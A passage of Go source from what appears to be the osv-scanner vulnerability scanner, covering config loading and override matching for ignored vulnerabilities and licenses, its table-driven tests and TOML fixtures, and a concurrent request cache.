func (c *Config) ShouldIgnorePackageVulnerabilities(pkg *extractor.Package) bool {
	overrides, _ := c.filterPackageVersionEntries(pkg, func(e PackageOverrideEntry) bool {
		return e.Vulnerability.Ignore
	})

	return overrides
}

// ShouldOverridePackageLicense determines if the given package should have its license ignored or changed based on override entries in the config
func (c *Config) ShouldOverridePackageLicense(pkg *extractor.Package) (bool, PackageOverrideEntry) {
	return c.filterPackageVersionEntries(pkg, func(e PackageOverrideEntry) bool {
		return e.License.Ignore || len(e.License.Override) > 0
	})
}

// shouldIgnoreTimestamp reports whether an entry with the given expiry is
// still in effect. An unset expiry means the entry stays in effect indefinitely.
func shouldIgnoreTimestamp(ignoreUntil time.Time) bool {
	if ignoreUntil.IsZero() {
		// If IgnoreUntil is not set, should ignore.
		return true
	}
	// Should ignore if IgnoreUntil is still after current time
	// Takes timezone offsets into account if it is specified; otherwise it's using local time
	return ignoreUntil.After(time.Now())
}

// warnAboutDuplicates logs a warning for every ignore entry whose ID already
// appeared earlier in the list.
func (c *Config) warnAboutDuplicates() {
	seen := make(map[string]struct{})

	for _, vuln := range c.IgnoredVulns {
		if _, ok := seen[vuln.ID]; ok {
			cmdlogger.Warnf("warning: %s has multiple ignores for %s - only the first will be used!", c.LoadPath, vuln.ID)
		}
		seen[vuln.ID] = struct{}{}
	}
}

================================================
FILE: internal/config/config_internal_test.go
================================================
package config

import (
	"fmt"
	"reflect"
	"strings"
	"testing"
	"time"

	"github.com/google/go-cmp/cmp"
	"github.com/google/osv-scalibr/extractor"
	apkmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/apk/metadata"
	"github.com/google/osv-scalibr/extractor/filesystem/osv"
	"github.com/google/osv-scalibr/purl"
)

// Attempts to normalize any file paths in the given `output` so that they can
// be compared reliably regardless of the file path separator being used.
//
// Namely, escaped (doubled) and single backslashes are replaced with forward slashes.
func normalizeFilePaths(t *testing.T, output string) string { t.Helper() return strings.ReplaceAll(strings.ReplaceAll(output, "\\\\", "/"), "\\", "/") } func Test_normalizeConfigLoadPath(t *testing.T) { t.Parallel() type args struct { target string } tests := []struct { name string args args want string wantErr bool }{ { name: "target_does_not_exist", args: args{ target: "./testdata/testdatainner/does-not-exist", }, want: "", wantErr: true, }, { name: "target_is_file_in_directory", args: args{ target: "./testdata/testdatainner/innerFolder/test.yaml", }, want: "testdata/testdatainner/innerFolder/osv-scanner.toml", wantErr: false, }, { name: "target_is_inner_directory_with_trailing_slash", args: args{ target: "./testdata/testdatainner/innerFolder/", }, want: "testdata/testdatainner/innerFolder/osv-scanner.toml", wantErr: false, }, { name: "target_is_inner_directory_without_trailing_slash", args: args{ target: "./testdata/testdatainner/innerFolder", }, want: "testdata/testdatainner/innerFolder/osv-scanner.toml", wantErr: false, }, { name: "target_is_directory_with_trailing_slash", args: args{ target: "./testdata/testdatainner/", }, want: "testdata/testdatainner/osv-scanner.toml", wantErr: false, }, { name: "target_is_file_in_directory", args: args{ target: "./testdata/testdatainner/some-manifest.yaml", }, want: "testdata/testdatainner/osv-scanner.toml", wantErr: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := normalizeConfigLoadPath(tt.args.target) if (err != nil) != tt.wantErr { t.Errorf("normalizeConfigLoadPath() error = %v, wantErr %v", err, tt.wantErr) return } got = normalizeFilePaths(t, got) if got != tt.want { t.Errorf("normalizeConfigLoadPath() got = %v, want %v", got, tt.want) } }) } } func Test_tryLoadConfig(t *testing.T) { t.Parallel() type args struct { configPath string } tests := []struct { name string args args want Config wantErr bool }{ { name: "config_does_not_exist", args: args{ configPath: 
"./testdata/testdatainner/does-not-exist", }, want: Config{}, wantErr: true, }, { name: "config_has_some_ignored_vulnerabilities_and_package_overrides", args: args{ configPath: "./testdata/testdatainner/osv-scanner.toml", }, want: Config{ LoadPath: "./testdata/testdatainner/osv-scanner.toml", IgnoredVulns: []*IgnoreEntry{ { ID: "GO-2022-0968", }, { ID: "GO-2022-1059", }, }, PackageOverrides: []PackageOverrideEntry{ { Name: "lib", Version: "1.0.0", Ecosystem: "Go", Ignore: true, Reason: "abc", }, { Name: "my-pkg", Version: "1.0.0", Ecosystem: "Go", Reason: "abc", Ignore: true, License: License{ Override: []string{"MIT", "0BSD"}, }, }, }, }, wantErr: false, }, { name: "load_path_cannot_be_overridden_via_config", args: args{ configPath: "./testdata/testdatainner/osv-scanner-load-path.toml", }, want: Config{ LoadPath: "", }, wantErr: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := tryLoadConfig(tt.args.configPath) if (err != nil) != tt.wantErr { t.Errorf("tryLoadConfig() error = %v, wantErr %v", err, tt.wantErr) return } if diff := cmp.Diff(tt.want, got); diff != "" { t.Errorf("tryLoadConfig() mismatch (-want +got):\n%s", diff) } }) } } func TestTryLoadConfig_UnknownKeys(t *testing.T) { t.Parallel() tests := []struct { configPath string unknownMsg string }{ { configPath: "./testdata/unknown-key-1.toml", unknownMsg: "IgnoredVulns.ignoreUntilTime", }, { configPath: "./testdata/unknown-key-2.toml", unknownMsg: "IgnoredVulns.ignoreUntiI", }, { configPath: "./testdata/unknown-key-3.toml", unknownMsg: "IgnoredVulns.reasoning", }, { configPath: "./testdata/unknown-key-4.toml", unknownMsg: "PackageOverrides.skip", }, { configPath: "./testdata/unknown-key-5.toml", unknownMsg: "PackageOverrides.license.skip", }, { configPath: "./testdata/unknown-key-6.toml", unknownMsg: "RustVersionOverride", }, { configPath: "./testdata/unknown-key-7.toml", unknownMsg: "RustVersionOverride, PackageOverrides.skip", }, } for _, testData := range 
tests { c, err := tryLoadConfig(testData.configPath) // we should always be returning an empty config on error if diff := cmp.Diff(Config{}, c); diff != "" { t.Errorf("tryLoadConfig() mismatch (-want +got):\n%s", diff) } if err == nil { t.Fatal("tryLoadConfig() did not return an error") } wantMsg := fmt.Sprintf("unknown keys in config file: %v", testData.unknownMsg) if err.Error() != wantMsg { t.Errorf("tryLoadConfig() error = '%v', want '%s'", err, wantMsg) } } } func TestConfig_ShouldIgnore(t *testing.T) { t.Parallel() type args struct { vulnID string } tests := []struct { name string config Config args args wantOk bool wantEntry *IgnoreEntry }{ // entry exists { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Time{}, Reason: "", }, }, }, args: args{ vulnID: "GHSA-123", }, wantOk: true, wantEntry: &IgnoreEntry{ ID: "GHSA-123", IgnoreUntil: time.Time{}, Reason: "", }, }, // entry does not exist { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Time{}, Reason: "", }, }, }, args: args{ vulnID: "nonexistent", }, wantOk: false, wantEntry: &IgnoreEntry{}, }, // ignored until a time in the past { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Now().Add(-time.Hour).Round(time.Second), Reason: "", }, }, }, args: args{ vulnID: "GHSA-123", }, wantOk: false, wantEntry: &IgnoreEntry{ ID: "GHSA-123", IgnoreUntil: time.Now().Add(-time.Hour).Round(time.Second), Reason: "", }, }, // ignored until a time in the future { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Now().Add(time.Hour).Round(time.Second), Reason: "", }, }, }, args: args{ vulnID: "GHSA-123", }, wantOk: true, wantEntry: &IgnoreEntry{ ID: "GHSA-123", IgnoreUntil: time.Now().Add(time.Hour).Round(time.Second), Reason: "", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk, gotEntry := 
tt.config.ShouldIgnore(tt.args.vulnID) if gotOk != tt.wantOk { t.Errorf("ShouldIgnore() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } if !reflect.DeepEqual(gotEntry, tt.wantEntry) { t.Errorf("ShouldIgnore() gotEntry = %v, wantEntry %v", gotEntry, tt.wantEntry) } }) } } func TestConfig_ShouldIgnorePackage(t *testing.T) { t.Parallel() tests := []struct { name string config Config args *extractor.Package wantOk bool wantEntry PackageOverrideEntry }{ { name: "Everything-level_entry_exists", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, // ------------------------------------------------------------------------- { name: "Ecosystem-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Ecosystem-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Ecosystem-level_entry_with_suffix_exists_and_does_match", config: Config{ PackageOverrides: 
[]PackageOverrideEntry{ { Ecosystem: "Alpine:v3.20", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "bin1", Version: "1.0.0", PURLType: purl.TypeApk, Metadata: &apkmetadata.Metadata{ PackageName: "bin1", OSID: "Alpine", OSVersionID: "3.20", }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ecosystem: "Alpine:v3.20", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Ecosystem-level_entry_with_suffix_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Alpine:v3.20", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "bin2", Version: "1.0.0", PURLType: purl.TypeApk, Metadata: &apkmetadata.Metadata{ PackageName: "bin1", OSID: "Alpine", OSVersionID: "3.19", }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Ecosystem-level_entry_without_suffix_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Alpine", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "bin1", Version: "1.0.0", PURLType: purl.TypeApk, Metadata: &apkmetadata.Metadata{ PackageName: "bin1", OSID: "Alpine", OSVersionID: "3.20", }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ecosystem: "Alpine", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, // ------------------------------------------------------------------------- { name: "Group-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: 
"Group-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"optional"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Group-level_entry_exists_and_does_not_match_when_empty", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Version-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Version: "1.0.0", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Version: "1.0.0", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Version-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Version: "1.0.0", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Name-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: 
"lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Name,_Version,_and_Ecosystem_entry_exists", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name_and_Ecosystem_entry_exists", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name,_Ecosystem,_and_Group_entry_exists_and_matches", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: 
[]string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name,_Ecosystem,_and_Group_entry_exists_but_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"prod"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Entry_doesn't_exist", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "2.0.0", Ecosystem: "Go", Ignore: false, EffectiveUntil: time.Time{}, Reason: "abc", }, { Name: "lib2", Version: "2.0.0", Ignore: true, Ecosystem: "Go", EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "2.0.0", PURLType: purl.TypeGolang, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk, gotEntry := tt.config.ShouldIgnorePackage(tt.args) if gotOk != tt.wantOk { t.Errorf("ShouldIgnorePackage() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } if !reflect.DeepEqual(gotEntry, tt.wantEntry) { t.Errorf("ShouldIgnorePackage() gotEntry = %v, wantEntry %v", gotEntry, tt.wantEntry) } }) } } func TestConfig_ShouldIgnorePackageVulnerabilities(t *testing.T) { t.Parallel() tests := []struct { name string config Config args *extractor.Package wantOk bool }{ { name: "Exact_version_entry_exists_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Vulnerability: Vulnerability{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, }, { name: 
"Version_entry_doesn't_exist_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Vulnerability: Vulnerability{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: false, }, { name: "Name_matches_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Vulnerability: Vulnerability{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk := tt.config.ShouldIgnorePackageVulnerabilities(tt.args) if gotOk != tt.wantOk { t.Errorf("ShouldIgnorePackageVulnerabilities() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } }) } } func TestConfig_ShouldOverridePackageLicense(t *testing.T) { t.Parallel() tests := []struct { name string config Config args *extractor.Package wantOk bool wantEntry PackageOverrideEntry }{ { name: "Exact_version_entry_exists_with_override", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, { name: "Exact_version_entry_exists_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Ignore: 
true, }, Reason: "abc", }, }, { name: "Version_entry_doesn't_exist_with_override", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Version_entry_doesn't_exist_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Name_matches_with_override", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, { name: "Name_matches_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk, gotEntry := tt.config.ShouldOverridePackageLicense(tt.args) if gotOk != tt.wantOk { t.Errorf("ShouldOverridePackageLicense() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } if !reflect.DeepEqual(gotEntry, tt.wantEntry) { t.Errorf("ShouldOverridePackageLicense() gotEntry = %v, wantEntry %v", gotEntry, 
tt.wantEntry) } }) } } ================================================ FILE: internal/config/manager.go ================================================ package config import ( "errors" "fmt" "os" "path/filepath" "strings" "github.com/BurntSushi/toml" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) type Manager struct { // Override to replace all other configs OverrideConfig *Config // Config to use if no config file is found alongside manifests DefaultConfig Config // Cache to store loaded configs ConfigMap map[string]Config } // UseOverride updates the Manager to use the config at the given path in place // of any other config files that would be loaded when calling Get func (m *Manager) UseOverride(configPath string) error { config, configErr := tryLoadConfig(configPath) if configErr != nil { return configErr } m.OverrideConfig = &config return nil } // Get returns the appropriate config to use based on the targetPath func (m *Manager) Get(targetPath string) Config { if m.OverrideConfig != nil { return *m.OverrideConfig } configPath, err := normalizeConfigLoadPath(targetPath) if err != nil { // TODO: This can happen when target is not a file (e.g. Docker container, git hash...etc.) 
// Figure out a more robust way to load config from non files // r.PrintErrorf("Can't find config path: %s\n", err) return Config{} } config, alreadyExists := m.ConfigMap[configPath] if alreadyExists { return config } config, configErr := tryLoadConfig(configPath) if configErr == nil { cmdlogger.Infof("Loaded filter from: %s", config.LoadPath) } else { // anything other than the config file not existing is most likely due to an invalid config file if !errors.Is(configErr, os.ErrNotExist) { cmdlogger.Errorf("Ignored invalid config file at %s because: %v", configPath, configErr) } // If config doesn't exist, use the default config config = m.DefaultConfig } m.ConfigMap[configPath] = config return config } func (m *Manager) GetUnusedIgnoreEntries() map[string][]*IgnoreEntry { entries := make(map[string][]*IgnoreEntry) for _, config := range m.ConfigMap { unusedEntries := config.UnusedIgnoredVulns() if len(unusedEntries) > 0 { entries[config.LoadPath] = unusedEntries } } if m.OverrideConfig != nil { unusedEntries := m.OverrideConfig.UnusedIgnoredVulns() if len(unusedEntries) > 0 { entries[m.OverrideConfig.LoadPath] = unusedEntries } } return entries } // Finds the containing folder of `target`, then appends osvScannerConfigName func normalizeConfigLoadPath(target string) (string, error) { stat, err := os.Stat(target) if err != nil { return "", fmt.Errorf("failed to stat target: %w", err) } var containingFolder string if !stat.IsDir() { containingFolder = filepath.Dir(target) } else { containingFolder = target } configPath := filepath.Join(containingFolder, OSVScannerConfigName) return configPath, nil } // tryLoadConfig attempts to parse the config file at the given path as TOML, // returning the Config object if successful or otherwise the error func tryLoadConfig(configPath string) (Config, error) { config := Config{} c, err := toml.DecodeFile(configPath, &config) if err == nil { unknownKeys := c.Undecoded() if len(unknownKeys) > 0 { keys := make([]string, 0, 
len(unknownKeys)) for _, key := range unknownKeys { keys = append(keys, key.String()) } return Config{}, fmt.Errorf("unknown keys in config file: %s", strings.Join(keys, ", ")) } config.LoadPath = configPath config.warnAboutDuplicates() } return config, err } ================================================ FILE: internal/config/testdata/testdatainner/innerFolder/test.yaml ================================================ ================================================ FILE: internal/config/testdata/testdatainner/osv-scanner-load-path.toml ================================================ LoadPath = "a/b/c" ================================================ FILE: internal/config/testdata/testdatainner/osv-scanner.toml ================================================ [[IgnoredVulns]] id = "GO-2022-0968" # ignoreUntil = 2022-11-09 # reason = "" # Optional reason [[IgnoredVulns]] id = "GO-2022-1059" # ignoreUntil = 2022-11-09 # Optional exception expiry date # reason = "" # Optional reason [[PackageOverrides]] name = "lib" version = "1.0.0" ecosystem = "Go" ignore = true # effectiveUntil = 2022-11-09 # Optional exception expiry date reason = "abc" [[PackageOverrides]] name = "my-pkg" version = "1.0.0" ecosystem = "Go" ignore = true reason = "abc" license.override = ["MIT", "0BSD"] ================================================ FILE: internal/config/testdata/testdatainner/some-manifest.yaml ================================================ ================================================ FILE: internal/config/testdata/unknown-key-1.toml ================================================ [[IgnoredVulns]] id = "GHSA-jgvc-jfgh-rjvv" ignoreUntilTime = 2024-08-02 # whoops, should be "ignoreUntil" reason = "..." ================================================ FILE: internal/config/testdata/unknown-key-2.toml ================================================ [[IgnoredVulns]] id = "GHSA-jgvc-jfgh-rjvv" ignoreUntiI = 2024-08-02 # whoops, should be "ignoreUntil" reason = "..." 
================================================ FILE: internal/config/testdata/unknown-key-3.toml ================================================ [[IgnoredVulns]] id = "GHSA-jgvc-jfgh-rjvv" ignoreUntil = 2024-08-02 reasoning = "..." # whoops, should be "reason" ================================================ FILE: internal/config/testdata/unknown-key-4.toml ================================================ [[PackageOverrides]] ecosystem = "npm" skip = true # whoops, should be "ignore" license.override = ["0BSD"] ================================================ FILE: internal/config/testdata/unknown-key-5.toml ================================================ [[PackageOverrides]] ecosystem = "npm" license.skip = false # whoops, should be "license.ignore" ================================================ FILE: internal/config/testdata/unknown-key-6.toml ================================================ RustVersionOverride = "1.2.3" # whoops, not supported ================================================ FILE: internal/config/testdata/unknown-key-7.toml ================================================ RustVersionOverride = "1.2.3" # whoops, not supported [[PackageOverrides]] ecosystem = "npm" skip = true # whoops, should be "ignore" ================================================ FILE: internal/datasource/cache.go ================================================ // Package datasource provides data sources for dependency resolution used by transitive scanning and guided remediation. 
package datasource

import (
	"bytes"
	"encoding/gob"
	"maps"
	"sync"
	"time"
)

// cacheExpiry is not referenced by the code shown here.
// NOTE(review): presumably the maximum age of a persisted cache before it is discarded - confirm against the callers.
const cacheExpiry = 6 * time.Hour

// gobMarshal encodes v with encoding/gob and returns the encoded bytes.
func gobMarshal(v any) ([]byte, error) {
	var b bytes.Buffer
	enc := gob.NewEncoder(&b)
	err := enc.Encode(v)
	if err != nil {
		return nil, err
	}

	return b.Bytes(), nil
}

// gobUnmarshal decodes the gob-encoded bytes in b into v.
//
// NOTE(review): the encoding/gob documentation states that the package is not hardened against
// adversarial input. The callers are outside this view - confirm that b only ever comes from
// cache data this tool wrote itself, never from a scanned project or a remote source.
func gobUnmarshal(b []byte, v any) error {
	dec := gob.NewDecoder(bytes.NewReader(b))
	return dec.Decode(v)
}

// requestCacheCall tracks one in-flight call made through RequestCache.Get.
type requestCacheCall[V any] struct {
	wg  sync.WaitGroup // released once the call has finished
	val V              // result of the call, read by waiters after wg is released
	err error          // error of the call, read by waiters after wg is released
}

// RequestCache is a map to cache the results of expensive functions that are called concurrently.
type RequestCache[K comparable, V any] struct {
	cache map[K]V                    // results of calls that returned a nil error
	calls map[K]*requestCacheCall[V] // calls that are currently in flight
	mu    sync.Mutex                 // guards cache and calls
}

// NewRequestCache returns an empty RequestCache with both internal maps allocated.
func NewRequestCache[K comparable, V any]() *RequestCache[K, V] {
	return &RequestCache[K, V]{
		cache: make(map[K]V),
		calls: make(map[K]*requestCacheCall[V]),
	}
}

// Get gets the value from the cache map if it's cached, otherwise it will call fn to get the value and cache it.
// fn will only ever be called once for a key, even if there are multiple simultaneous calls to Get before the first call is finished.
//
// Only successful results are cached. A failed call hands its error to the goroutines that were
// waiting on it, and a later Get for the same key calls fn again.
// fn runs without rq.mu held, so calls for different keys do not block each other.
//
// NOTE(review): there is no defer/recover around fn. If fn panics, c.wg.Done() is never reached and
// the entry stays in rq.calls, so goroutines waiting on this key would remain blocked - confirm that
// the functions passed in cannot panic, or that a panic always ends the process.
func (rq *RequestCache[K, V]) Get(key K, fn func() (V, error)) (V, error) {
	// Try get it from regular cache.
	rq.mu.Lock()
	if v, ok := rq.cache[key]; ok {
		rq.mu.Unlock()
		return v, nil
	}

	// See if there is already a pending request for this key.
	if c, ok := rq.calls[key]; ok {
		// Release the lock before waiting so the goroutine running fn can take it to publish its result.
		rq.mu.Unlock()
		c.wg.Wait()

		return c.val, c.err
	}

	// Cache miss - create the call.
	c := new(requestCacheCall[V])
	c.wg.Add(1)
	rq.calls[key] = c
	rq.mu.Unlock()

	c.val, c.err = fn()
	rq.mu.Lock()
	defer rq.mu.Unlock()

	// Allow other waiting goroutines to return
	c.wg.Done()

	// Store value in regular cache.
	if c.err == nil {
		rq.cache[key] = c.val
	}
	// Remove the completed call now that it's cached.
	// The entry is only deleted if it is still the call created above.
	if rq.calls[key] == c {
		delete(rq.calls, key)
	}

	return c.val, c.err
}

// GetMap gets a shallow clone of the stored cache map.
